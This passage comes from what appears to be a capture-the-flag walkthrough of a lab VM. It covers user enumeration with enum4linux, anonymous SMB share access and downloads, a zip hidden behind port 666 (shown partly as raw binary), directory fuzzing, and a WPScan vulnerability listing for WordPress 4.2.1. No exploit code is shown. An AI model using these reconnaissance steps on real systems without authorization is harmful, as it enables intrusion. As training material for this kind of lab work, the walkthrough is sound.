S-1-5-32-1030 *unknown*\*unknown* (8) S-1-5-32-1031 *unknown*\*unknown* (8) S-1-5-32-1032 *unknown*\*unknown* (8) S-1-5-32-1033 *unknown*\*unknown* (8) S-1-5-32-1034 *unknown*\*unknown* (8) S-1-5-32-1035 *unknown*\*unknown* (8) S-1-5-32-1036 *unknown*\*unknown* (8) S-1-5-32-1037 *unknown*\*unknown* (8) S-1-5-32-1038 *unknown*\*unknown* (8) S-1-5-32-1039 *unknown*\*unknown* (8) S-1-5-32-1040 *unknown*\*unknown* (8) S-1-5-32-1041 *unknown*\*unknown* (8) S-1-5-32-1042 *unknown*\*unknown* (8) S-1-5-32-1043 *unknown*\*unknown* (8) S-1-5-32-1044 *unknown*\*unknown* (8) S-1-5-32-1045 *unknown*\*unknown* (8) S-1-5-32-1046 *unknown*\*unknown* (8) S-1-5-32-1047 *unknown*\*unknown* (8) S-1-5-32-1048 *unknown*\*unknown* (8) S-1-5-32-1049 *unknown*\*unknown* (8) S-1-5-32-1050 *unknown*\*unknown* (8) ============================================== | Getting printer info for 192.168.43.10 | ============================================== No printers returned. enum4linux complete on Tue Sep 25 14:17:16 2018 [GandoPC 192.168.43.10]# cat users.txt S-1-22-1-1000 Unix User\peter (Local User) S-1-22-1-1001 Unix User\RNunemaker (Local User) S-1-22-1-1002 Unix User\ETollefson (Local User) S-1-22-1-1003 Unix User\DSwanger (Local User) S-1-22-1-1004 Unix User\AParnell (Local User) S-1-22-1-1005 Unix User\SHayslett (Local User) S-1-22-1-1006 Unix User\MBassin (Local User) S-1-22-1-1007 Unix User\JBare (Local User) S-1-22-1-1008 Unix User\LSolum (Local User) S-1-22-1-1009 Unix User\IChadwick (Local User) S-1-22-1-1010 Unix User\MFrei (Local User) S-1-22-1-1011 Unix User\SStroud (Local User) S-1-22-1-1012 Unix User\CCeaser (Local User) S-1-22-1-1013 Unix User\JKanode (Local User) S-1-22-1-1014 Unix User\CJoo (Local User) S-1-22-1-1015 Unix User\Eeth (Local User) S-1-22-1-1016 Unix User\LSolum2 (Local User) S-1-22-1-1017 Unix User\JLipps (Local User) S-1-22-1-1018 Unix User\jamie (Local User) S-1-22-1-1020 Unix User\Drew (Local User) S-1-22-1-1022 Unix User\SHAY (Local User) S-1-22-1-1023 Unix User\Taylor (Local User) S-1-22-1-1024 Unix User\mel (Local User) S-1-22-1-1025 Unix User\kai (Local User) S-1-22-1-1027 Unix User\NATHAN (Local User) S-1-22-1-1028 Unix User\www (Local User) S-1-22-1-1029 Unix User\elly (Local User)
Shares and users are discovered. I added those users to the list:
[GandoPC 192.168.43.10]# cat users.txt | cut -d '\' -f2 | cut -d ' ' -f1 >> potential_users Elly John Tim zoe Fred kathy peter RNunemaker ETollefson DSwanger AParnell SHayslett MBassin JBare LSolum IChadwick MFrei SStroud CCeaser JKanode CJoo Eeth LSolum2 JLipps jamie Drew SHAY Taylor mel kai NATHAN www elly
Next, I tried to dig for some info:
[GandoPC 192.168.43.10]# smbclient //192.168.43.10/kathy -U "" -N Try "help" to get a list of possible commands. smb: \> ls . D 0 Fri Jun 3 19:52:52 2016 .. D 0 Tue Jun 7 00:39:56 2016 kathy_stuff D 0 Sun Jun 5 18:02:27 2016 backup D 0 Sun Jun 5 18:04:14 2016 19478204 blocks of size 1024. 16395204 blocks available smb: \> cd kathy_stuff\ smb: \kathy_stuff\> ls . D 0 Sun Jun 5 18:02:27 2016 .. D 0 Fri Jun 3 19:52:52 2016 todo-list.txt N 64 Sun Jun 5 18:02:27 2016 19478204 blocks of size 1024. 16395200 blocks available smb: \kathy_stuff\> get todo-list.txt getting file \kathy_stuff\todo-list.txt of size 64 as todo-list.txt (2.2 KiloBytes/sec) (average 2.2 KiloBytes/sec) smb: \kathy_stuff\> cd ../backup\ smb: \backup\> ls . D 0 Sun Jun 5 18:04:14 2016 .. D 0 Fri Jun 3 19:52:52 2016 vsftpd.conf N 5961 Sun Jun 5 18:03:45 2016 wordpress-4.tar.gz N 6321767 Mon Apr 27 20:14:46 2015 19478204 blocks of size 1024. 16395200 blocks available smb: \backup\> get vsftpd.conf getting file \backup\vsftpd.conf of size 5961 as vsftpd.conf (166.3 KiloBytes/sec) (average 117.1 KiloBytes/sec) smb: \backup\> get wordpress-4.tar.gz getting file \backup\wordpress-4.tar.gz of size 6321767 as wordpress-4.tar.gz (778.7 KiloBytes/sec) (average 770.5 KiloBytes/sec) smb: \backup\> quit
Nothing interesting in "vsftpd.conf" and "wordpress-4.tar.gz".
Port 666 check:
Attempt to communicate with port 666 using ncat:
[GandoPC 192.168.43.10]# ncat 192.168.43.10 666
PKdýýHpýýý,2
message2.jpgUT +ýQWJýQWux
ýýz
TýýýPýýýA@ý ýUTýTý2>ýýRDKýJjý"DL[Eý
0<4ý®nýýýVýWýH ýýýý
_ýdrýýý9ýýuýYý3oXýYý2ýeýýýýý=2ýýýy}ýaýýýý>`ý ý:ýyýýýýý^ýýsCýý
ýýnc$Iýý+jý[ýýýýý=,ýýýýsý½ýýýýisýM?ýýýýeYýýýýýýýý]sSýbQýýýýýAoAýý9ÂýýýxýOY4ýýýý1ýNýýý3wýýý&&qýý'iýfLýý\ýýýýý:ýiýrýýýý{ýýý:iýkýýTýý/ý-W÷&ýNý<ý\.ýýý$ýýý^ýýýgý.¼ý|Wýýýýýýjýf~ýýx'ý|ùOýýýý`a"ýKVýý
ouýýýý7ý|ýýÄOýnK>#)ýýý{ýýýg8ýu([rýH~AýqYQqýwýý?}ýý?ýýTyýýjkýýSWýýýýýýfýFýkýýýýyýýýýýýY_?n2ýýýÆ^
ýýýýýmýýf".ýý?Býýýý,ýý[ý&ýNbMýýýVýý 3&M~{ýýýý-ý]_ýý[qtýýýo/¶ýýýýýýýÏýýýý_@Nýýýýý{ýýEýýýýýýýiý.Lý\gDýýpýýýYm
SWbýNý&ýýývOý3A#ý,ýý^ýýýýýý4ýCHý}ýý~ýRý`wTýýKTamÙfýý'ýýST%ý5ýý
ýýL}AJýHý2ý(OkiýýýýdNýýý.npy.9ýýRr9ý®ý#ýOgýýý~ý]VýBGuýý=ýýýHUýýýIýýGTQýýýý
Lýýýýý*P?ýýýýDfvý`ýýkýSýP0ýýý
ýýýqý2ýýýtýwýýýý;ýýýýGýýýýý?P]ýVýýý4ýh(}]LEýHiýýý2~ý@ÝýxnaýýUýýý'4ýzýý%jow^Moý~:ý ýýyÍo½nýýýý=faýýýrýpýýýUýtýyýýB~q^7ý,ýýý:ýý©;ýýýý{ýýýO 1MýÁýýýýTýýYýýýýO°7ý:ý/ý7;ýý"3\ýýlt6"9:ý?ý,ýýýýMyýT1ýýý2ýx5
ýýzýýzýý(hoýýýcGBn]ý3ýý7ýýJAý"¹
ýýrýej.ý~ý\G Býýýuýýýýýýý!ýBaBýVý'9ý2ýýTý|ý,ýýýý=ý)pýýwýýýýý]T4ýbýýýýý&ýký]7ýýciY"I4ýP
nýýýýýýaýtýýýýýý7ýýeý'Qnqýýýlýýýý0ý#Uýbý7?ýýýýýý_ýýS7ý#ý:ýW]ýýýoý4ýýýýýýýUyýJUýý~ýý+wýýýý*lý)7c_ý\rz>0m
v^Effu|LX+/Sýýdýýyýý# ývÃFýq=ýýuýýýýýýýý:ýýc$Gýg}}ýýliiýýýýpý8.ýý$9c5ýxýzýýPýýýuýýýiWýý%ýtU:ýýýpBSKýýýýývýýaýý>ýýýU@ýýýý:!u8ýô=ýgýýaý
1ý_ýýýdý_ýýýýýýýýý~Wýýýýcý.>ý1GýýeýbýýAýýýýýýý_ýýAý'¾ýLýýfhiýýý4ýy{ýýý%ý0kývqýýýjkjýFýýhýýýuýUGjýý'ýý2ýýýT`(]Iývýýýýý9Aýýý¬ýýG*ýýH8ýý5ý>]ý2ý
ýýýý0ý}ý$rýsf*Pb8ý(ý[ý)ýýOeýý1ýýý}
ý6ýýMGnýý.ýý
ýý6ýý.Rý.,ýUýýiýz+4ýýý,LwBýb*sýý.2"nkýb/\Mý<r1býýOi6ýý^~ýýý=Sýý*ýýwýhYdýSý:ýzdýZSiýý]ýAýLHý3)ýxý~c(^yýK"zmý[Mýýý%ýýýýðýýýMýG@ýjUýtýTýý3>výq¡0ýý
TlOýýXýýaý<ýýýový)ýZýfý?ýýýýý:ý0>ýýý<ýý,ýýý%*Dý
ý9$Fýýý$+?aýKýhN
TLkyýý%ýý_ý|PýýýýýdýY&oýý<ýýB8úýýý!ýýýR/\_vi%rýýýKNýMý"ýý1ýSýýQ0ýýýýl
9ý`PýI<ýýýýýýýýýý-ý$UýzýýýýýUt}ýýý5Q2ýýýýSý'Jýý8ý@%ýý[
ýaý;ýký2ýýPrýýýKýýýýýaýý9ý|ýýd ýý¾TýTýýMý;ýxLýýýMýýýNýýSZA4ýJýýýý|ýýýýýNýýý
7Výýmtý#j->P: gýýVý
*ýýýýiý²ýýýjýcRMýýý(ý^ýýýý4ý}kF<$Bj$ýýý~ýýCýý">ýý(ý7ý}2<ýi_1ýý*ý
ýý(ýýjSýýýv:ýýzXýwýý=ýýý!ýýýýýJEýýý^iýýj?;2ýýiqB'ýýýýmýX:o4)ýýý~ým?ý)CýFýýýýýsBýý$ýedý]ý4ýL3ýýaýý
aIg
%ýýsýý|:ýý>³ýyR(ý*U\ý\Rû2jýký2ýýýýý&R{ ýDbý9hsBý(ý,/||@ýJýýýý¾1ýýÙý
ýxý|ýý^@ýýýzýý|dpcývý0ýýk@ýÃýý
týýp)ýýýKQAýýýýnBýý!ýI$ý$\ýc*ýýýýýMrýýýýHZ|ýyýým®ze0ýýSýý>ýBL5s}eýz'ýýý$F2ýýýýc*ýýýýýýýfýýýýýZýdýOý
ýýý]FýýIýbbz#ýýz.iýýS?gXýýýýýqýý(ýýýýM-!M$ýý8eýkQýeýy}ý&Eýýýýýýý%\ýj|9ýýýVý2EqýýýýýsýH6pVnYpý<ýýfýýýýýýýýýýýýyýýK}ý:gýJ0ÂCYý{ýýo*%ý4ýýývý výýýaýýýývWýi~ýýýtýý ýý2ýýýýjýS%j{ýýýýýýýLý#=ýý3ýýýý
mýýýýý eýýý;ýIýe·\Kýýý£ý-Kr
ýý%Eýýýaýýý-3ýýýý.ý`T0ýýý4ýýýýý:ýJXDýýýýxýýýHPý`ýýýoýQBýý1ý~ýýnýýýýýgýý=ýýFýyýiý
ý_výL&e:UýýLý
ý
ýýýM"x`ýý^x+o*ý\ýH9
WýýJT~ý;"?ýqýý=ýxýýýý&ýýýýAý2ýýýEduS.xýýý×ýýfýXý`?ýýý%ýýýý5ZýýýBdýR5ýýý{k#2 ýý
jýaýýýýeýýýbXlýý=ýýýZý&Ký}ýDýýý4ýNrLýdFý ýýý]%Wý}1ýt%o
~ý5ýý
Ðý'ýýý*ý`cýý?7]ýýýý
ýDE|7ý{ýýAýý_ýl5cýýý3ýý1ý8ýIýwyý(fýUAýý(Dý\ýýZýBýTýýýdýWStý#Yýýý!ývtýýQýGý:R5ýeTv+ýLÊýýU)KýýýJýýýýkfýryXýýýý4m$ýjýýDoý?ýýýýýýý=ýTýsýýwýýSLýýýýYýMýa"km_ý-jUýý6?hhýýj'92t-ýýUýý{d7%ý:ý'
ý(cý ýý5)ýýxý^ýlýýýuGîý2ýýýýýýýýýýýý-lýo)ý(mMýýýýýK}ýJýi:ý6ýapý\%ýp ýý}ý V9ýw<ýýýýýýýý
ýýýaeLýýyý9ýýQ6ý¹
ýýoýýBýý
2_ý.x2ýýýH7ýýý8ý/ýLeýýýý0ýýýý$ýUý\[ýývýE?WVý~ýÑýýýýýzýýýP5ýiýaýýý"dýýýýEýýýýýe4ýýýýVK}ýýýý*ýýýýS"ý4ýý[ýý=Cýýt??ýq}{Cýgwýý2Sýuýüýý#4ýýýýýý?ýýqO;ýýýC1ýýý7ý:VýoýýýgýS]uý#ýk"ý;ýýMrQRx1y]ýC$ýýýwýýUýnR5ýýýýGýýýmWAýý~ýý_^0RkfýýýWSýÛý0ýý^uýIý?=ýC{ýý1ýým yýýý"ýýMý7ý§ýV0ýýo j)>ýýý<:ý$ýý&9yý#ýkbýO']B2bý#ýhYýAýýý\ýý)Yoýýýtixyeýý
A2;{eýýzýý
ýýýPýsýýý@ýýKýýCýýFJývýgýýýýwTJý6;.,ýý)fýýýýjÛý*ý.8ýQýSýdyLwý4ýý#2ý[ýý{ý>ýnýNý%ýzýýUjýýýýýXAýDëh7ýý)'ýýVýpýLýýlýýý1ýýý0uýý6ýýýqBýý_ýPI9ý'$Wý@Rýý %ýýý4v[0ý«ýý2DýýtýpGwv/ýDr:NýZýSýý|ýýwýÄ%ýýýe7ýLý±BýCb2ýcýiýdýMýý
ýýýýýpn+pýýýýý@3ýPýýým6ýkýýZ1 bdýXG*4ýDýqBÞ3ýVGþgcýýx6ýýiýoýýýZ%fCýýwýýqkýSýCý&ýQJýýýýýc
3ýýýýýý]`ý¾8ý1*pýZýýý7ý
výýý7ýýýýfýýý9ýýýlRopGýýý?Jýýý<ýýýXKý[fm4~01ýý]:?Oý
ýýYýý_#ý¬ý>cý>8ý)ýÝ HuBýkýýý. uq}|ýýýýqý9~fMýýýý<ýýýýý%ýPQýýUýýýlý%ý:ýgbJ8ý8xýýý!ýlýýóýA_]ý#ýýKý9býn}ýk~?<ýa_ýý
ýý
ýý8ýPý
ý
ý>R=Zýý%ýX5ý3]ýSýVýý`Eý¿Uýýý45ýýSý4ýDýýýLýýýd)=;Ms_ýýý]HýNQ,ý$j
ýý"ý~[ýe
{ý.ýe.ýý=l býýý:ýýýýý7ý=
4ý1]Mýý.:XýýýýZý*ýýJ
ýzWýýýDýSýý
%ýýýýýyý,Aý ýýý=L<ýý0IýýGGýýÞ
ýýQ"&{Týýý}u4ý{ý2cýýýýýýýýýýý+~ýýýýaçýýýIýcýýýLýýýýmLýýý|Sýý/ýi-
ýfýJýPýý{4ýýýeýýWýýý>8ý\ýý1ýý^ýý@*ý,ýBýýýýUý[qý&ýý %ýý~ýýZýEýf
ýQ±ýýýkýý(1\k-J
ý+ýýýýýfqýýc"\ýý ýýýzM$ýoýýCýýýýý*Gýýýýý/Rýýýý>.ýtýýzý
ýýFýýIýýýýýý"ý
>Jvýýýýýý9ýR
5`Rýýýtýýý^ý[ý>ýýýdýýQxý4GRýiý%ýýýýhxný&j^`ýýýRýýGýNRýý%jý]ýi^LýýeLýtBýýýýKTýýDýzý 7ýýWwBn
ý3o#ý9ýgzý)wýý výPi HQTO5ýýýKýAýýPýýýý;[nýxKtýýxUýýÕýýýýýLýýýýEt@l.jýýýHýýýý"ýýV+fýýý4QOýý)tBýýýýý=}ýq#ýýrý%t!c\Oý7XýýBrýýdy"ýýýýsýsýTýpýDýý5ýLk)IYýýýýýý`t0ýýý/Zýýýýýdeý&ýýý&ý->ýý$klÁXýýý¤×rýwýýýTýÜtýMýýýý9ýlxKo;8$ýýQa}Lý\ cký
ýBi
i`o#ýý$>V1_\ýýý'ý2ýýýCý\ýýýýýcêrýT.'ld½+ýý@nýýý_\1U8ýýýýýý6ýýýýý6¶WUý
ý8nýIýýSýcr&,zý-ýàkýýIýýSgTSaýSGNýýý)j4
Lýý!ýý|ýRaOmKý&ýýýq;Fý
ýýý@lG>-5ýmý
ý>ný%}<8 ýýýaýdýýcýýýýýýfýJ]ZIýýAýýýkýýýýýg}]výt#ýý"ý&ýý]ýZýý$ýgý'býPý
/ý]R*ýýdx;\ýý)=ýýýEýýý ý,ýýQ_ý]Cý&ýý7ýýýýý~ýdýýýýW+ý2ýýv.hý2;ýýhYeý3JýPýýýýýX]M[ýýyýýýLýUýýV}ý8ýýfý,ýgeýýý|Ï-ýý
Zý!oý
a ýlýýýý($ýý$ýLýMóýýý=ýý7ýZýg'DMý½oýIývýýý.HJýnbýý7ýýýßK4ýýbSýýýHýý+ýcýý
Yý9ý\ý($ýýýý
ýýý%ý _ýý6ýiýRFýýSýIG{ýýýCOyý(ýHýýýýý,ýýýgýýrýWCýýðzýýeaýxjýýýýZýýB]ZýdS[ýuXýýýh}ýP{fQýý_ý,ýNhýý{ý;}_41ýd"ýýý"ýý"
UýNýý:ýý)}ýýýýekýýýatýAýý{ý"ùý ýýýVýýGOý+
ýýÖýýýýýdý&~ýOýýrýý<ý/ýý2ýýpýýýDý{gýýýýC0zý]ýe
ýýýýýýýA\^uls%ýýýý
ýýu|ý6ýýýýýýýgýwiýTýý;ý Uý,i?]ýXýýýýý
ýýýýýzPý(/Bfuýý9Xý@ý|S"2(ý'ýý`ýýýSýý`]Kýý%ý ý'Zý"pýAý)ýýýýýTýYmýý8s
ýý^aQýýdýýýýý$ý^ýýý?b2cýýNýýýýýRýýýýEFýýýý-ýýý4ýIýVKýýý]ýýýýýýý#ýýDvYýý1d2ýý'ý
`ý _ýtý#Ùýsýýý;uqýmý
ýEý8Kýýý^ý
ýý5Nhz cccý
ý\Sý
ýOXý3ýýlG(ýýý~ýýýýr0*uý85_ýýMýýý:
2ýýý%\ýýýýTý>ýrý\fýey~;ýýýýcýFyQýjGýýq>ýgKkýý/ýG4ýýýý|@ýsýB
ý
ýýýý}ý_ý)Iýý=Âý=ýýýý7ýýýý~ýý9U7ýkýýýýýýýýWýýýýýC3ý
ýýýzýkýýýdýFýNa73Rý%9'ýýýý[ýl&Z*ýKýýrýPýýýTýýý:ý~Uýý!&ýýý
Tý
|ýýIIýýPqwýý,ýa
ýTýL6ýýEýFýýn$ý'Jýýýcýýý`ýDý+TVM_ýý{ý
h$ýý-[12Fý:ý ýýWý9cýýýrý)ýýý9ýybýý%ýýýýýýlRýýýãýN=ýfýý_ýý9ý;*ýTwFýOýb
"ýOýcýýFýýuUýlgý3ýÃeQX4ýý:ýýnY°ýqý@%ýýýýýýFýV. }~s?gý:ýSkýd(_Lýýý>8ýýýýýýTIýý~ýýNýýrNAý7ýýý6ý
ý ýsU>Sýbýj"ýýý gýýýký ýýUMýOEýý8ýýýeýý%#/ÙEýýývý?ýýKhýýýHýý$ý=ýýb;!(ý(ýýe1ýýý3ýý
ýýýs@ýiýPýÖý~ýý|ýýýýýsýýýuýLSýeýýpýmýfýFcýý5jd?ýýRsg ?ýLýýyBýýdSýi[$ýýýýý4\<ýrRýý0ýý_YxýA|ý^ýýýd<ýHýý8#ýýý
*G*|ýý@U^ý?ýýiýý1ýý)ýý?Rý=ýý
Vý=ý;ýýýDbý2ýý>ýýa'ýý*ýýý
ýý$$ýýIxý}ýý$[ýýýýýýý8xý/0ý|ýýpojeýný"}ýý3ýýA6ýB ]ýý#ýý{6ýAýLrM,{2XýýK·µB-ý*Kýiýýý'pýý^ý+uýýOýJýDu5Gsý\ýýýD\ýýýFýý´ýfýýW3ýý.ýýVýýn4ý_rý,ýoAýý
ýfOlýqRýýýýýýýýýýHKý]ýd=ýý&RÛýN,{}ý=ýýRýMýýtýIý/Lýý-}ýý.ý-ýýn"%¹ýaýý^ýý}ý2ý!0ýjB#ý}#ýgýywýý/ýýýýýý$ýJ.wýyý[eý
9<@ý=ýýFýviýý!e:$p738ýZý ýGýxýý~ýýOýyfýýQýý;ýýiý 6FKýhýxýýýTýý mýýý
2ýýjýýýiýýý4*ýývýPý'|ýý+8 výhýýoB7ýý2e1ýnaý;ýHýýOM8Gý/ý^ýý*Iýý'ýý<ý\B#ýý¾ýýý7Rýýýýý"~N1ýogýýaýýp]Kýý£#hý:ýpýýýM$ýýa\5yo
BVQý29fk>ýýýý/l0ý^ýlýý
9Dýý4ý9qýBaýXVt÷ýý`ýKýe%9Nýrýýýýýýýqýýýý_PKdýýHpýýý,2
ýýmessage2.jpgUT+ýQWux
ýPKRý,^C
[GandoPC 192.168.43.10]# ncat 192.168.43.10 666 > pic.jpeg
[GandoPC 192.168.43.10]# file pic.jpeg
pic.jpeg: Zip archive data, at least v2.0 to extract
[GandoPC 192.168.43.10]# unzip pic.jpeg
Archive: pic.jpeg
inflating: message2.jpg
[GandoPC 192.168.43.10]# strings message2.jpg
JFIF
vPhotoshop 3.0
8BIM
1If you are reading this, you should get a cookie!
8BIM
$3br
%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
#3R
&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz
/<}m
>,xr?
u-o[
Sxw]
v;]>
|_m7
l~!|0
>5[^k
;o{o
>xgH
mCXi
PE,&
n<;oc
*? xC
~ |y
6{M6
Nothing on port 666, but at least i have a cookie ;)
Port 12380 check:
Attempt to access via http port 12380:
Interesting. Next, I tried to spider and fuzz it:
A message from HR department has been discovered:
I took this base64 string and I tried to convert it to an image, hopefully to get some information inside:
Unfortunately, I got an error.
Attempt to access via https port 12380:
Real quick, I started to fuzz for some directories and files:
I found a phpMyAdmin page that i can use later for brute force attack or just a simple login:
/Announcements directory was found too:
There's a message inside:
Not something important except for additional user name.
Robots.txt is presented too:
/admin112233/ directory:
Troll.
/blogblog/ directory:
Nice.
Spidering and fuzzing the target URL revealed that it runs on Wordpress:
Then, I ran WPScan in order to enumerate plugins and users:
[GandoPC 192.168.43.10]# wpscan --url https://192.168.43.10:12380/blogblog/ --enumerate ap
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 2.9.4
Sponsored by Sucuri - https://sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________
[+] URL: https://192.168.43.10:12380/blogblog/
[+] Started: Tue Sep 25 14:49:06 2018
[+] Interesting header: DAVE: Soemthing doesn't look right here
[+] Interesting header: SERVER: Apache/2.4.18 (Ubuntu)
[+] XML-RPC Interface available under: https://192.168.43.10:12380/blogblog/xmlrpc.php [HTTP 405]
[+] Found an RSS Feed: https://192.168.43.10:12380/blogblog/?feed=rss2 [HTTP 200]
[!] Detected 1 user from RSS feed:
+------------+
| Name |
+------------+
| John Smith |
+------------+
[!] Upload directory has directory listing enabled: https://192.168.43.10:12380/blogblog/wp-content/uploads/
[!] Includes directory has directory listing enabled: https://192.168.43.10:12380/blogblog/wp-includes/
[+] Enumerating WordPress version ...
[!] The WordPress 'https://192.168.43.10:12380/blogblog/readme.html' file exists exposing a version number
[+] WordPress version 4.2.1 (Released on 2015-04-27) identified from advanced fingerprinting, meta generator, readme, links opml, stylesheets numbers
[!] 55 vulnerabilities identified from the version number
[!] Title: WordPress 4.1-4.2.1 - Unauthenticated Genericons Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/7979
Reference: https://codex.wordpress.org/Version_4.2.2
[i] Fixed in: 4.2.2
[!] Title: WordPress <= 4.2.2 - Authenticated Stored Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8111
Reference: https://wordpress.org/news/2015/07/wordpress-4-2-3/
Reference: https://twitter.com/klikkioy/status/624264122570526720
Reference: https://klikki.fi/adv/wordpress3.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5622
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5623
[i] Fixed in: 4.2.3
[!] Title: WordPress <= 4.2.3 - wp_untrash_post_comments SQL Injection
Reference: https://wpvulndb.com/vulnerabilities/8126
Reference: https://github.com/WordPress/WordPress/commit/70128fe7605cb963a46815cf91b0a5934f70eff5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2213
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Timing Side Channel Attack
Reference: https://wpvulndb.com/vulnerabilities/8130
Reference: https://core.trac.wordpress.org/changeset/33536
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5730
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Widgets Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8131
Reference: https://core.trac.wordpress.org/changeset/33529
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5732
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Nav Menu Title Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8132
Reference: https://core.trac.wordpress.org/changeset/33541
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5733
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.2.3 - Legacy Theme Preview Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8133
Reference: https://core.trac.wordpress.org/changeset/33549
Reference: https://blog.sucuri.net/2015/08/persistent-xss-vulnerability-in-wordpress-explained.html
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5734
[i] Fixed in: 4.2.4
[!] Title: WordPress <= 4.3 - Authenticated Shortcode Tags Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8186
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5714
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - User List Table Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8187
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: https://github.com/WordPress/WordPress/commit/f91a5fd10ea7245e5b41e288624819a37adf290a
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7989
[i] Fixed in: 4.2.5
[!] Title: WordPress <= 4.3 - Publish Post & Mark as Sticky Permission Issue
Reference: https://wpvulndb.com/vulnerabilities/8188
Reference: https://wordpress.org/news/2015/09/wordpress-4-3-1/
Reference: http://blog.checkpoint.com/2015/09/15/finding-vulnerabilities-in-core-wordpress-a-bug-hunters-trilogy-part-iii-ultimatum/
Reference: http://blog.knownsec.com/2015/09/wordpress-vulnerability-analysis-cve-2015-5714-cve-2015-5715/
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5715
[i] Fixed in: 4.2.5
[!] Title: WordPress 3.7-4.4 - Authenticated Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8358
Reference: https://wordpress.org/news/2016/01/wordpress-4-4-1-security-and-maintenance-release/
Reference: https://github.com/WordPress/WordPress/commit/7ab65139c6838910426567849c7abed723932b87
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1564
[i] Fixed in: 4.2.6
[!] Title: WordPress 3.7-4.4.1 - Local URIs Server Side Request Forgery (SSRF)
Reference: https://wpvulndb.com/vulnerabilities/8376
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36435
Reference: https://hackerone.com/reports/110801
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2222
[i] Fixed in: 4.2.7
[!] Title: WordPress 3.7-4.4.1 - Open Redirect
Reference: https://wpvulndb.com/vulnerabilities/8377
Reference: https://wordpress.org/news/2016/02/wordpress-4-4-2-security-and-maintenance-release/
Reference: https://core.trac.wordpress.org/changeset/36444
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2221
[i] Fixed in: 4.2.7
[!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
Reference: https://wpvulndb.com/vulnerabilities/8473
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
Reference: https://wpvulndb.com/vulnerabilities/8474
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
[i] Fixed in: 4.5
[!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
Reference: https://wpvulndb.com/vulnerabilities/8475
Reference: https://codex.wordpress.org/Version_4.5
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
[i] Fixed in: 4.5
[!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
Reference: https://wpvulndb.com/vulnerabilities/8488
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
[i] Fixed in: 4.5.2
[!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
Reference: https://wpvulndb.com/vulnerabilities/8489
Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
[i] Fixed in: 4.2.8
[!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
Reference: https://wpvulndb.com/vulnerabilities/8518
Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
